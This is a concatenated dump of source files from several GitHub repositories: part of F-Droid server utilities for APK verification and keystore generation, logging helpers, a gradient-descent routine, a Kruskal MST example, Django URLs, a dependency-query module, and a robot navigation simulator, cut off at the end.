orig_path\n\n if env is None:\n env = os.environ\n orig_path = env['PATH']\n for n in ['ANDROID_HOME', 'ANDROID_SDK']:\n env[n] = config['sdk_path']\n for k, v in config['java_paths'].items():\n env['JAVA%s_HOME' % k] = v\n\n missinglocale = True\n for k, v in env.items():\n if k == 'LANG' and v != 'C':\n missinglocale = False\n elif k == 'LC_ALL':\n missinglocale = False\n if missinglocale:\n env['LANG'] = 'en_US.UTF-8'\n\n if build is not None:\n path = build.ndk_path()\n paths = orig_path.split(os.pathsep)\n if path not in paths:\n paths = [path] + paths\n env['PATH'] = os.pathsep.join(paths)\n for n in ['ANDROID_NDK', 'NDK', 'ANDROID_NDK_HOME']:\n env[n] = build.ndk_path()\n\n\ndef replace_config_vars(cmd, build):\n cmd = cmd.replace('$$SDK$$', config['sdk_path'])\n cmd = cmd.replace('$$NDK$$', build.ndk_path())\n cmd = cmd.replace('$$MVN3$$', config['mvn3'])\n cmd = cmd.replace('$$QT$$', config['qt_sdk_path'] or '')\n if build is not None:\n cmd = cmd.replace('$$COMMIT$$', build.commit)\n cmd = cmd.replace('$$VERSION$$', build.version)\n cmd = cmd.replace('$$VERCODE$$', build.vercode)\n return cmd\n\n\ndef place_srclib(root_dir, number, libpath):\n if not number:\n return\n relpath = os.path.relpath(libpath, root_dir)\n proppath = os.path.join(root_dir, 'project.properties')\n\n lines = []\n if os.path.isfile(proppath):\n with open(proppath, \"r\", encoding='iso-8859-1') as o:\n lines = o.readlines()\n\n with open(proppath, \"w\", encoding='iso-8859-1') as o:\n placed = False\n for line in lines:\n if line.startswith('android.library.reference.%d=' % number):\n o.write('android.library.reference.%d=%s\\n' % (number, relpath))\n placed = True\n else:\n o.write(line)\n if not placed:\n o.write('android.library.reference.%d=%s\\n' % (number, relpath))\n\napk_sigfile = re.compile(r'META-INF/[0-9A-Za-z]+\\.(SF|RSA|DSA|EC)')\n\n\ndef verify_apks(signed_apk, unsigned_apk, tmp_dir):\n \"\"\"Verify that two apks are the same\n\n One of the inputs is signed, the other is unsigned. The signature metadata\n is transferred from the signed to the unsigned apk, and then jarsigner is\n used to verify that the signature from the signed apk is also varlid for\n the unsigned one.\n :param signed_apk: Path to a signed apk file\n :param unsigned_apk: Path to an unsigned apk file expected to match it\n :param tmp_dir: Path to directory for temporary files\n :returns: None if the verification is successful, otherwise a string\n describing what went wrong.\n \"\"\"\n with ZipFile(signed_apk) as signed_apk_as_zip:\n meta_inf_files = ['META-INF/MANIFEST.MF']\n for f in signed_apk_as_zip.namelist():\n if apk_sigfile.match(f):\n meta_inf_files.append(f)\n if len(meta_inf_files) < 3:\n return \"Signature files missing from {0}\".format(signed_apk)\n signed_apk_as_zip.extractall(tmp_dir, meta_inf_files)\n with ZipFile(unsigned_apk, mode='a') as unsigned_apk_as_zip:\n for meta_inf_file in meta_inf_files:\n unsigned_apk_as_zip.write(os.path.join(tmp_dir, meta_inf_file), arcname=meta_inf_file)\n\n if subprocess.call([config['jarsigner'], '-verify', unsigned_apk]) != 0:\n logging.info(\"...NOT verified - {0}\".format(signed_apk))\n return compare_apks(signed_apk, unsigned_apk, tmp_dir)\n logging.info(\"...successfully verified\")\n return None\n\napk_badchars = re.compile('''[/ :;'\"]''')\n\n\ndef compare_apks(apk1, apk2, tmp_dir):\n \"\"\"Compare two apks\n\n Returns None if the apk content is the same (apart from the signing key),\n otherwise a string describing what's different, or what went wrong when\n trying to do the comparison.\n \"\"\"\n\n apk1dir = os.path.join(tmp_dir, apk_badchars.sub('_', apk1[0:-4])) # trim .apk\n apk2dir = os.path.join(tmp_dir, apk_badchars.sub('_', apk2[0:-4])) # trim .apk\n for d in [apk1dir, apk2dir]:\n if os.path.exists(d):\n shutil.rmtree(d)\n os.mkdir(d)\n os.mkdir(os.path.join(d, 'jar-xf'))\n\n if subprocess.call(['jar', 'xf',\n os.path.abspath(apk1)],\n cwd=os.path.join(apk1dir, 'jar-xf')) != 0:\n return(\"Failed to unpack \" + apk1)\n if subprocess.call(['jar', 'xf',\n os.path.abspath(apk2)],\n cwd=os.path.join(apk2dir, 'jar-xf')) != 0:\n return(\"Failed to unpack \" + apk2)\n\n # try to find apktool in the path, if it hasn't been manually configed\n if 'apktool' not in config:\n tmp = find_command('apktool')\n if tmp is not None:\n config['apktool'] = tmp\n if 'apktool' in config:\n if subprocess.call([config['apktool'], 'd', os.path.abspath(apk1), '--output', 'apktool'],\n cwd=apk1dir) != 0:\n return(\"Failed to unpack \" + apk1)\n if subprocess.call([config['apktool'], 'd', os.path.abspath(apk2), '--output', 'apktool'],\n cwd=apk2dir) != 0:\n return(\"Failed to unpack \" + apk2)\n\n p = FDroidPopen(['diff', '-r', apk1dir, apk2dir], output=False)\n lines = p.output.splitlines()\n if len(lines) != 1 or 'META-INF' not in lines[0]:\n meld = find_command('meld')\n if meld is not None:\n p = FDroidPopen(['meld', apk1dir, apk2dir], output=False)\n return(\"Unexpected diff output - \" + p.output)\n\n # since everything verifies, delete the comparison to keep cruft down\n shutil.rmtree(apk1dir)\n shutil.rmtree(apk2dir)\n\n # If we get here, it seems like they're the same!\n return None\n\n\ndef find_command(command):\n '''find the full path of a command, or None if it can't be found in the PATH'''\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(command)\n if fpath:\n if is_exe(command):\n return command\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, command)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\n\ndef genpassword():\n '''generate a random password for when generating keys'''\n h = hashlib.sha256()\n h.update(os.urandom(16)) # salt\n h.update(socket.getfqdn().encode('utf-8'))\n passwd = base64.b64encode(h.digest()).strip()\n return passwd.decode('utf-8')\n\n\ndef genkeystore(localconfig):\n '''Generate a new key with random passwords and add it to new keystore'''\n logging.info('Generating a new key in \"' + localconfig['keystore'] + '\"...')\n keystoredir = os.path.dirname(localconfig['keystore'])\n if keystoredir is None or keystoredir == '':\n keystoredir = os.path.join(os.getcwd(), keystoredir)\n if not os.path.exists(keystoredir):\n os.makedirs(keystoredir, mode=0o700)\n\n write_password_file(\"keystorepass\", localconfig['keystorepass'])\n write_password_file(\"keypass\", localconfig['keypass'])\n p = FDroidPopen([config['keytool'], '-genkey',\n '-keystore', localconfig['keystore'],\n '-alias', localconfig['repo_keyalias'],\n '-keyalg', 'RSA', '-keysize', '4096',\n '-sigalg', 'SHA256withRSA',\n '-validity', '10000',\n '-storepass:file', config['keystorepassfile'],\n '-keypass:file', config['keypassfile'],\n '-dname', localconfig['keydname']])\n # TODO keypass should be sent via stdin\n if p.returncode != 0:\n raise BuildException(\"Failed to generate key\", p.output)\n os.chmod(localconfig['keystore'], 0o0600)\n # now show the lovely key that was just generated\n p = FDroidPopen([config['keytool'], '-list', '-v',\n '-keystore', localconfig['keystore'],\n '-alias', localconfig['repo_keyalias'],\n '-storepass:file', config['keystorepassfile']])\n logging.info(p.output.strip() + '\\n\\n')\n\n\ndef write_to_config(thisconfig, key, value=None):\n '''write a key/value to the local config.py'''\n if value is None:\n origkey = key + '_orig'\n value = thisconfig[origkey] if origkey in thisconfig else thisconfig[key]\n with open('config.py', 'r', encoding='utf8') as f:\n data = f.read()\n pattern = '\\n[\\s#]*' + key + '\\s*=\\s*\"[^\"]*\"'\n repl = '\\n' + key + ' = \"' + value + '\"'\n data = re.sub(pattern, repl, data)\n # if this key is not in the file, append it\n if not re.match('\\s*' + key + '\\s*=\\s*\"', data):\n data += repl\n # make sure the file ends with a carraige return\n if not re.match('\\n$', data):\n data += '\\n'\n with open('config.py', 'w', encoding='utf8') as f:\n f.writelines(data)\n\n\ndef parse_xml(path):\n return XMLElementTree.parse(path).getroot()\n\n\ndef string_is_integer(string):\n try:\n int(string)\n return True\n except ValueError:\n return False\n\n\ndef get_per_app_repos():\n '''per-app repos are dirs named with the packageName of a single app'''\n\n # Android packageNames are Java packages, they may contain uppercase or\n # lowercase letters ('A' through 'Z'), numbers, and underscores\n # ('_'). However, individual package name parts may only start with\n # letters. https://developer.android.com/guide/topics/manifest/manifest-element.html#package\n p = re.compile('^([a-zA-Z][a-zA-Z0-9_]*(\\\\.[a-zA-Z][a-zA-Z0-9_]*)*)?$')\n\n repos = []\n for root, dirs, files in os.walk(os.getcwd()):\n for d in dirs:\n print('checking', root, 'for', d)\n if d in ('archive', 'metadata', 'repo', 'srclibs', 'tmp'):\n # standard parts of an fdroid repo, so never packageNames\n continue\n elif p.match(d) \\\n and os.path.exists(os.path.join(d, 'fdroid', 'repo', 'index.jar')):\n repos.append(d)\n break\n return repos\n","repo_name":"touchao123/fdroidserver","sub_path":"fdroidserver/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":76518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44197863534","text":"import datetime\nimport os\n\n\ndef nothing_printer(*_, **__):\n pass\n\n\nclass BlankLogger:\n\n @staticmethod\n def write(msg):\n pass\n\n def __call__(self, msg):\n pass\n\n\nclass PrintToScreenAndFile:\n\n def __init__(self, output_filename):\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n self.f = open(output_filename, \"w\")\n\n def __call__(self, msg):\n self.write(msg)\n\n def write(self, msg):\n self.f.write(msg + \"\\n\")\n self.f.flush()\n os.fsync(self.f.fileno())\n print(msg)\n\n\nclass DurationEstimator:\n\n def __init__(self, total_objects, context=\"\", window_length=None):\n self.total_objects = total_objects\n self.time_checks = [datetime.datetime.now(), None]\n self.object_checks = [0, None]\n self.context = context\n if self.context:\n self.context += \" \"\n if window_length is None:\n self.window_length = max(1, int(total_objects/1000))\n else:\n self.window_length = window_length\n\n def _do_estimate(self, objects_done, now):\n objects_done_in_window = objects_done - self.object_checks[0]\n if objects_done_in_window == 0:\n return \"Don't know\"\n time_in_window = now - self.time_checks[0]\n time_per_object = time_in_window / objects_done_in_window\n remaining_objects = self.total_objects - objects_done\n remaining_time = time_per_object * remaining_objects\n return now + remaining_time\n\n def _update_checks(self, objects_done, now):\n if objects_done == 0:\n return\n if objects_done % self.window_length == 0:\n if self.time_checks[1] is None:\n # First time we have self.window_length objects\n # update [1]\n self.time_checks[1] = now\n self.object_checks[1] = objects_done\n elif objects_done > self.object_checks[1]:\n # A later time through - shuffle\n self.time_checks[0] = self.time_checks[1]\n self.object_checks[0] = self.object_checks[1]\n self.time_checks[1] = now\n self.object_checks[1] = objects_done\n\n def estimate(self, objects_done):\n now = datetime.datetime.now()\n self._update_checks(objects_done, now)\n return self._do_estimate(objects_done, now)\n\n def print_estimate(self, objects_done, per_call_context=\"\"):\n out = f\"{self.context}[{objects_done}/{self.total_objects}] done. Est. finish: {self.estimate(objects_done)}.\"\n if per_call_context:\n out += f\" {per_call_context}.\"\n print(out)\n\n def print_estimate_if(self, objects_done, every, per_call_context=\"\"):\n if objects_done % every == 0:\n self.print_estimate(objects_done, per_call_context=per_call_context)\n\n\ndef sort_and_thin_probs(data, number_to_show: int):\n # Data is assumed to be an iterable of two-tuples array with numbers (probabilities) in 2nd entry\n # Sort by highest first\n # But trim to show only 'number_to_show' entries, with rest in 'Other'\n # Useful as a prep step to displaying output from the identifier\n res = []\n else_prob = 0.0\n interim = sorted(data, key=lambda y: y[1], reverse=True)\n for ix, (name, prob) in enumerate(interim):\n if ix < number_to_show:\n res.append((name, \"%.1f%%\" % (100.0 * prob)))\n else:\n else_prob += prob\n res.append((\"Other\", \"%.1f%%\" % (100.0 * else_prob)))\n return res\n","repo_name":"Pcb21/hebeloma-project","sub_path":"hebident/hebident/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32701796088","text":"import numpy as np\n\ndef compute_cost(X, y, theta):\n m = X.shape[0]\n hypo = np.dot(X, theta)\n return np.sum(np.power(np.subtract(hypo, y), 2)) / 2 / m\n\ndef gradient_descent(X, y, theta, alpha, iter_count):\n m = X.shape[0]\n theta_count = theta.shape[0]\n # print(X[:, 0].reshape(X.shape[0], 1))\n theta_history = np.array([])\n for i in range(iter_count):\n hypo = np.dot(X, theta)\n temp_theta = theta\n for j in range(theta_count):\n cond = np.multiply(np.subtract(hypo, y), X[:, j].reshape(X.shape[0], 1))\n temp_theta[j] = theta[j] - (alpha / m) * np.sum(cond)\n theta = temp_theta\n theta_history = np.append(theta_history, theta)\n return theta, theta_history.reshape(-1, theta.shape[0])","repo_name":"atomellar/coursera-ml-python","sub_path":"ex1-linear-regression/c_math.py","file_name":"c_math.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10573223871","text":"\"\"\"\n( 신장 트리 ) p, 280\n\n- 하나의 그래프가 있을 때 [ 모든 노드를 포함 ]\n- 사이클이 존재 x\n\n( 크루스칼 알고리즘 ) p, 281~283\n- '최소 신장 트리 알고리즘' 중 하나\n- [ 가장 적은 비용 ]으로 모든 노드를 연결 가능 \n- 그리디 알고리즘으로 분류\n\n(방법)\n- 모든 간선에 대하여 '오름차순 정렬 '을 수행\n- 가장 거리가 짧은 '간선' 부터 집합에 포함\n- 사이클이 발생할 수 있는 '간선'의 경우 집합 포함 x\n\n( 알고리즘 )\n 1. 간선 데이터를 비용에 따라 [ 오름차순으로 정렬 ].\n \n 2. 간선을 하나씩 확인하며 '현재의 간선이' 사이클을 발생하는지 확인.\n (1). [ 사이클이 발생하지 않는 경우 ] 최소 신장 트리에 [ 포함시킨다. ]\n (2). [ 사이클이 발생하는 경우 ] 최소 신장 트리에 [ 포함시키지 않는다. ]\n 3. 모든 간선에 대하여 (2번의 과정을 반복한다.)\n\n- 최종적으로 신장 트리에 포함되는 간선의 개수가 '노드의 개수 -1'과 같다는 특징\nex) 노드의 개수가 7이면 --> 최종적으로 [ 신장 트리에 포함되는 간선의 개수 ]는 '6'이다. \n \n\"\"\"\n\n# 책 정답 10-5.py (p, 288~289 )\n# 특정 원소가 속한 집합을 찾기\ndef find_parent(parent, x):\n # 루트 노드가 아니라면, [ 루트 노드를 찾을 때까지 ] '재귀적'으로 호출\n if parent[x] != x:\n parent[x] = find_parent(parent, parent[x])\n return parent[x]\n\n# 두 원소가 [ 속한 집합 ]을 '합치기' --> 큰 번호를 갖는 노드를 [ 작은 번호 노드로 ] 부모 변경.\ndef union_parent(parent, a, b):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\n# [ 노드의 개수 ]와 [ 간선(Union 연산)의 개수 ] 입력 받기\nv, e = map(int, input().split())\nparent = [0] * (v + 1) # [ 부모 테이블 초기화 ]하기\n\n# 모든 [ 간선을 담을 리스트 ]와, [ 최종 비용을 담을 ] 변수\nedges = []\nresult = 0\n\n# 부모 테이블상에서, 부모를 [ 자기 자신으로 ] 초기화\nfor i in range(1, v + 1):\n parent[i] = i\n\n# [ 모든 '간선'에 대한 정보 ]를 입력 받기\nfor _ in range(e):\n a, b, cost = map(int, input().split())\n # [ ** 비용순으로 정렬 ** ]하기 위해서 ' 튜플의 첫 번째 원소를 비용 '으로 설정\n edges.append((cost, a, b))\n\n# '간선'�� [ 비용순으로 정렬( 오름 차순 ) ]\nedges.sort()\n\n# 간선을 하나씩 확인하며\nfor edge in edges:\n cost, a, b = edge # 비용, 간선을 옆 변수에 저장.\n \n # [ 사이클이 발생하지 않는 경우 ]에만 집합에 포함\n if find_parent(parent, a) != find_parent(parent, b):\n union_parent(parent, a, b)\n result += cost # [ 최종 비용에 ] 추가로 더함.\n \nprint(\"최소 신장 트리를 만드는데 필요한 비용 :\" + str(result))\n\n# 부모 테이블 내용 출력하기\nprint('부모 테이블: ', end='')\nfor i in range(1, v + 1):\n print(parent[i], end=' ')","repo_name":"heeya15/PythonCodingTest","sub_path":"10_그래프 이론/(10-5)크루스칼 알고리즘.py","file_name":"(10-5)크루스칼 알고리즘.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2178503336","text":"from django.urls import path, include\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.main, name = \"main\"),\n path(\"login\", views.userAuth, name = \"login\"),\n path(\"home\", views.home, name = \"home\" ),\n path(\"logout\", views.user_logout, name = \"logout\"),\n path(\"pao/\", include(\"pao.urls\")),\n path(\"oopk/\", include(\"oopk.urls\"))\n \n] ","repo_name":"hyxp3r/paosystem_new","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21053453237","text":"import os\nfrom source_hunter.result import Result\nfrom source_hunter.utils.log_utils import logger\n\n\nclass Query:\n def __init__(self, deps_tree):\n \"\"\"\n :param deps_tree: deps_tree obj\n \"\"\"\n self.deps_tree = deps_tree\n\n def _find_caller_query_helper(self, module_path, class_or_func, seen, result):\n callee_fnode = self.deps_tree.path_fnode_dict.get(module_path, None)\n if callee_fnode and callee_fnode not in seen:\n seen.add(callee_fnode)\n for caller_fnode in callee_fnode.parents:\n calling_items = caller_fnode.get_caller(class_or_func)\n if calling_items:\n result.add_calling_relation(callee_fnode, caller_fnode)\n for calling_item in calling_items:\n self._find_caller_query_helper(caller_fnode.file_path, calling_item, seen, result)\n return result\n\n def find_caller(self, module_path, class_or_func):\n result = Result(self.deps_tree.root_path)\n return self._find_caller(module_path, class_or_func, result)\n\n def _find_caller(self, module_path, class_or_func, result=None):\n if not result:\n result = Result(self.deps_tree.root_path)\n self._find_caller_query_helper(module_path, class_or_func, set(), result)\n logger.info('result contains {} relationship'.format(len(result.relationship)))\n return result\n\n def find_deps(self, module_path, class_or_func):\n result = Result(self.deps_tree.root_path)\n return self._find_deps(module_path, class_or_func, result)\n\n def _find_deps(self, module_path, class_or_func, result=None):\n if not result:\n result = Result(self.deps_tree.root_path)\n start_fnode = self.deps_tree.path_fnode_dict.get(module_path, None)\n if start_fnode:\n stack = []\n for dep in start_fnode.get_deps(class_or_func):\n stack.append((dep, start_fnode))\n while stack:\n dep, caller_fnode = stack.pop()\n dep_fnode = self.deps_tree.finder.fnode_by_import(dep, caller_fnode.dir_path)\n if dep_fnode:\n result.add_calling_relation(dep_fnode, caller_fnode)\n module_name = os.path.basename(dep_fnode.file_path).split('.')[0]\n dep_name_idx = dep.find(module_name)\n if dep_name_idx > 0:\n dep_class_or_func = dep[dep_name_idx + len(module_name):]\n if dep_class_or_func.startswith('.'):\n dep_class_or_func = dep_class_or_func[1:]\n for dep in dep_fnode.get_deps(dep_class_or_func):\n stack.append((dep, dep_fnode))\n return result\n\n def find_caller_and_deps(self, module_path, class_or_func):\n result = Result(self.deps_tree.root_path)\n self._find_deps(module_path, class_or_func, result)\n self._find_caller(module_path, class_or_func, result)\n return result\n","repo_name":"pyeprog/source_hunter","sub_path":"source_hunter/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7437178960","text":"\"\"\"\nMake a simple simulator that uses particles\n\"\"\"\nimport sys; import os; sys.path.append(os.getcwd())\nimport os\nfrom particles import Particles\nimport cv2\nfrom cv2 import VideoWriter, VideoWriter_fourcc\nimport numpy as np\nfrom labels import label2color\nfrom rslang_utils import pose2pixel, point, pixel2pose, to_onehot, to_onehot_array\nimport click\nfrom os.path import join, basename, dirname\nfrom lut import LUT\nfrom rslang_utils import numify, resize50, to_array, show, angle_between, round_angle, l2\nimport json\nfrom constants import MazeConstants as MC, MotionModel as MM, EpisodeConstants as EC, Files\nfrom functools import lru_cache\nfrom labels import COLORS, color2label, LABELS\nimport random\nfrom skimage.draw import line\nfrom constants import Action\nfrom floyd_warshall import FloydWarshallRobotslang\n\n# Colors in BGR format\nWHITE = (255, 255, 255)\nRED = ( 0, 0, 255)\nBLUE = (255, 0, 0)\nGREEN = ( 0, 255, 0)\n\n@lru_cache()\ndef get_targets(fname=Files.basedir + '/lookup_scans.json'):\n with open(fname, 'r') as f:\n out = json.load(f)\n return out\n\nclass RobotSlangSimulator:\n\n def __init__(self, scanId, show_rays=True, show_grid=True): \n self.scanId = scanId\n self.root, self.target, agent_pose, goal_pose = scanId.split('-')\n self.root = os.path.join(Files.basedir, dirname(self.root))\n self.agent_pose_ini = to_array(agent_pose)\n self.goal_pose_ini = to_array(goal_pose)\n \n # Cache variables\n self.pmc_var = None\n # Visualization settnigs\n self.show_rays = show_rays\n self.show_grid = show_grid \n \n # Floyd warshall algorithm for shortest path supervision\n self.mapfile_var = join(self.root, Files.objfile)\n self.planner = FloydWarshallRobotslang(self.mapfile_var)\n \n # Navigation pixels for visualization\n self.nav_pixels = self.planner.navigable_pixels\n\n ## Target poses\n self.target_poses = get_targets()[scanId]\n self.target_pixels = pose2pixel(np.asarray(self.target_poses), MC.mazeshape)\n self.target_pixels = list(zip([\"jar\", \"mug\", \"paddle\"], self.target_pixels))\n\n # Randomize location of agent and goal\n self.agent = Particles(1)\n self.goal = Particles(1)\n\n # Start by resetting\n self.reset()\n\n @property\n def pmc(self):\n if self.pmc_var is None:\n obj_map = join(self.root, Files.objfile) \n self.pmc_var = LUT(obj_map)\n return self.pmc_var\n\n @property\n def mapfile(self):\n if type(self.mapfile_var) == str:\n self.mapfile_var = cv2.imread(self.mapfile_var)\n return self.mapfile_var\n\n def face_object(self):\n \"\"\"Start trials facing the target object\"\"\"\n self.step_counter = -1\n \n # Move away from starting pose / object\n for i in range(20):\n action = self.next_shortest_path_action()\n self.makeActions(action)\n self.agent.pose = self.cnl(self.agent.pose)\n \n # Find starting object pose\n ndx = 0 if self.target == 'mug' else 1\n back_to = self.target_poses[ndx]\n\n # Face starting object \n while l2(back_to, self.agent.pose) >= 3*MM.R:\n action = self.next_shortest_path_action(self.agent.pose, back_to) \n self.makeActions(action)\n self.agent.pose = self.cnl(self.agent.pose)\n \n def reset(self):\n self.goal.pose[ ...,:2] = self.goal_pose_ini\n self.goal.pose[:] = self.cnl(self.goal.pose)\n \n # Set poses\n if self.target == 'jar':\n self.agent.pose[:] = self.agent_pose_ini[:]\n self.agent.pose[:] = self.cnl(self.agent.pose)\n else:\n self.agent.pose[...,:2] = self.agent_pose_ini\n self.agent.pose[:] = self.cnl(self.agent.pose)\n self.face_object()\n \n # Reinit the step counte\n self.step_counter = -1\n \n def cnl(self, pose):\n \"\"\"Closes Navigable Location according to choices of discretization\"\"\"\n pose[:,:2] = self.planner.closest_node_pose(pose)\n if pose.shape[-1] == 3:\n pose[:,2] = round_angle(pose[:,2], MM.T)\n return pose\n \n def check_collision(self):\n R = self.getR()\n new_pose = self.agent.next_pose(R, 0)\n collision = self.planner.get_top_dist(self.agent.pose, new_pose)\n collision = collision > .11 # if not a side or hypotenuse away \n return collision\n\n def draw_circle(self, viz, px, rad=MC.ORAD, color=BLUE):\n cv2.circle(viz, point(px), rad, tuple([int(c) for c in color]), thickness=-1)\n return viz\n\n def display(self, viz=None, draw_measurements=False):\n # Draw agent\n viz = self.mapfile.copy() if viz is None else viz.copy()\n \n # Draw the navigable locations\n if self.show_grid:\n for p in self.nav_pixels:\n self.draw_circle(viz, p, rad=5, color=(128, 128, 0))\n \n # Draw rays cast from the agent\n if self.show_rays:\n self.draw_rays(viz, self.agent.pose)\n \n # Draw the orientation\n self.draw_orientation(viz, self.agent.pose)\n \n # Draw the agent\n self.draw_agent(viz, self.agent.pose)\n \n # Draw the trajectory\n traj = self.planner(self.agent.pose, self.goal.pose)\n self.draw_trajectory(viz, traj)\n \n if draw_measurements:\n # Add visualization lines\n colors, depths = self.draw_measurement_lines()\n # Resize for visualization\n itype = cv2.INTER_NEAREST\n colors = cv2.resize(colors, (viz.shape[1], 100), interpolation=itype)\n depths = cv2.resize(depths, (viz.shape[1], 100), interpolation=itype)\n viz = np.concatenate((viz, colors, colors * 0, depths), 0)\n\n return viz\n\n def draw_agent(self, viz, pose):\n stp, enp = self.orientation_vector(pose)\n st_pix = pose2pixel(stp, viz.shape)\n self.draw_circle(viz, st_pix, rad=MC.PRAD*2, color=BLUE)\n\n def orientation_vector(self, pose, r=.03):\n stp = np.squeeze(pose)\n enp = stp[:2] + r * np.asarray([np.cos(stp[2]), np.sin(stp[2])])\n return stp, enp\n \n def draw_orientation(self, viz, pose, thickness=10): \n # Start and end pose for arrow\n stp, enp = self.orientation_vector(pose)\n\n # Convert to pixel\n st_pix = pose2pixel(stp, viz.shape)\n en_pix = pose2pixel(enp, viz.shape)\n \n # Draw orientation\n cv2.arrowedLine(viz, point(st_pix), point(en_pix), GREEN, thickness=thickness)\n return viz\n \n def draw_rays(self, viz, pose):\n stp, enp = self.orientation_vector(pose)\n st_pix = pose2pixel(stp, viz.shape)\n out = self.pmc.get_rays(pose)\n for o in out:\n cv2.line(viz, point(st_pix), point(o), WHITE, thickness=4)\n return viz\n\n def draw_measurement_lines(self):\n # Add measurement below\n color = self.get_visual_obs(self.agent.pose)\n measurement = np.expand_dims(color, 0)\n measurement = label2color(measurement)\n\n depth = self.get_depth_obs(self.agent.pose)\n depth /= max(depth.max(), 1e-12)\n depth = depth.reshape(1,-1, 1)\n cvec = 255*np.ones((1, color.shape[0], 3))\n cvec = np.uint8(255 - depth * cvec)\n\n return measurement, cvec\n\n def get_input(self):\n c = click.getchar()\n if c == '\\x1b[A': #forward\n action = Action.FORWARD\n elif c == '\\x1b[C': #left\n action = Action.LEFT\n elif c == '\\x1b[D': #right\n action = Action.RIGHT\n else:\n print(\"Not supported\")\n action = 3\n #elif c == '\\x1b[B': #backward\n # action = Action.BACKWARD\n\n return action\n \n def play(self):\n while True:\n show(self.display(draw_measurements=True), 30)\n action = self.get_input()\n self.makeActions(action)\n\n \n def getR(self):\n # Hypotenuse or straight motion\n degrees = np.abs(np.degrees(self.agent.pose[:,2]) - np.asarray([0, 90, 180, 270, 360]))\n \n if degrees.min() < 1 : \n R = MM.R\n else:\n R = MM.R * np.sqrt(2)\n return R\n \n #def next_shortest_path_action(self):\n # \"\"\"RANDOM BASELINE\"\"\"\n # if self.step_counter < 119:\n # if not self.check_collision():\n # action = random.sample([Action.FORWARD, Action.LEFT, Action.RIGHT], 1)[0]\n # else:\n # action = random.sample([Action.LEFT, Action.RIGHT], 1)[0]\n # return action\n # else:\n # return Action.END \n \n def next_shortest_path_action(self, pose1=None, pose2=None):\n \"\"\"teacher action\"\"\"\n if pose1 is None:\n pose1 = self.agent.pose\n if pose2 is None:\n pose2 = self.goal.pose\n next_node = self.planner.next_node(pose1, pose2)\n if next_node.sum() > 0:\n action = self.get_action(next_node)\n return action \n else:\n return Action.END \n \n def get_action(self, next_node):\n \n if self.step_counter < EC.max_len:\n stp, enp = self.orientation_vector(self.agent.pose)\n angle = angle_between(next_node - stp[:2], enp - stp[:2])\n \n if np.abs(angle) < np.radians(1):\n action = Action.FORWARD\n elif np.sign(angle) == 1:\n action = Action.LEFT\n else:\n action = Action.RIGHT\n else:\n # End the episode after step counter threshold passed\n action = Action.END\n\n return action\n \n def makeActions(self, action):\n self.step_counter += 1\n R = self.getR()\n\n if action == Action.FORWARD: # Forward\n dr = R\n da = 0\n elif action == Action.RIGHT: # Right\n dr = 0\n da = MM.T\n elif action == Action.LEFT: # Left\n dr = 0\n da = -MM.T \n else:\n dr = da = 0\n \n # move the agent\n self.agent.move(dr, da)\n self.agent.pose[:] = self.cnl(self.agent.pose)\n \n #self.visualize_every_episode()\n \n def get_visual_obs(self, pose):\n colors = self.pmc[pose]\n return colors\n \n def get_depth_obs(self, pose):\n rays = self.pmc.get_rays(pose)\n agent = self.agent.pose[:,:2]\n poses = pixel2pose(rays, MC.mazeshape)\n dists = np.linalg.norm(agent-poses, axis=1)\n return dists \n \n def get_obs(self, pose=None):\n if pose is None:\n pose = self.agent.pose\n colors = self.get_visual_obs(pose).flatten() \n colors = to_onehot_array(colors, len(LABELS)).flatten()\n dists = self.get_depth_obs(pose).flatten()\n out = np.concatenate((colors, dists, [self.check_collision()]))\n return out\n\n def draw_trajectory(self, viz, traj_poses, color=(59,181,207)):\n if traj_poses is not None:\n traj_pix = pose2pixel(traj_poses, viz.shape)\n for i in range(len(traj_pix)-1):\n cv2.line(viz, point(traj_pix[i]), point(traj_pix[i+1]), color, thickness=4)\n return viz\n \n \n def __repr__(self):\n return \"{}-{}\".format(numify(self.root), self.target)\n \n def shortest_agent(self):\n action = None\n while action != Action.END:\n action = self.next_shortest_path_action()\n self.makeActions(action)\n return self.step_counter\n\n def shortest_agent_images(self):\n action = None\n while action != Action.END:\n yield self.display(draw_measurements=True) \n action = self.next_shortest_path_action()\n self.makeActions(action)\n \n def get_all_data(self):\n \"\"\"\n Used to make a zero mean / unit variance scaler\n \"\"\"\n data = []\n action = None\n while action != Action.END:\n data.append(self.get_obs(self.agent.pose))\n # Move along shortest path\n action = self.next_shortest_path_action()\n self.makeActions(action)\n return np.asarray(data)\n \n def make_video(self, folder):\n width = 700\n height = 588\n fps = 30\n fourcc = VideoWriter_fourcc(*'MP42')\n vfile = '{}/{}.avi'.format(folder, str(self)) \n video = VideoWriter(vfile, fourcc, float(fps), (width, height))\n \n traj = self.planner(self.agent.pose, self.goal.pose)\n \n while True:\n img = self.display()\n self.draw_trajectory(img, traj)\n img = resize50(img)\n video.write(img)\n # Move along shortest path\n action = self.next_shortest_path_action()\n self.makeActions(action)\n if action == Action.END:\n break\n\n video.release()\n\n print('Video saved to: {}'.format(vfile))\n return self.step_counter\n\n\nif __name__ == \"__main__\":\n from rslang_utils import load_data\n random_trial = random.sample(load_data(), 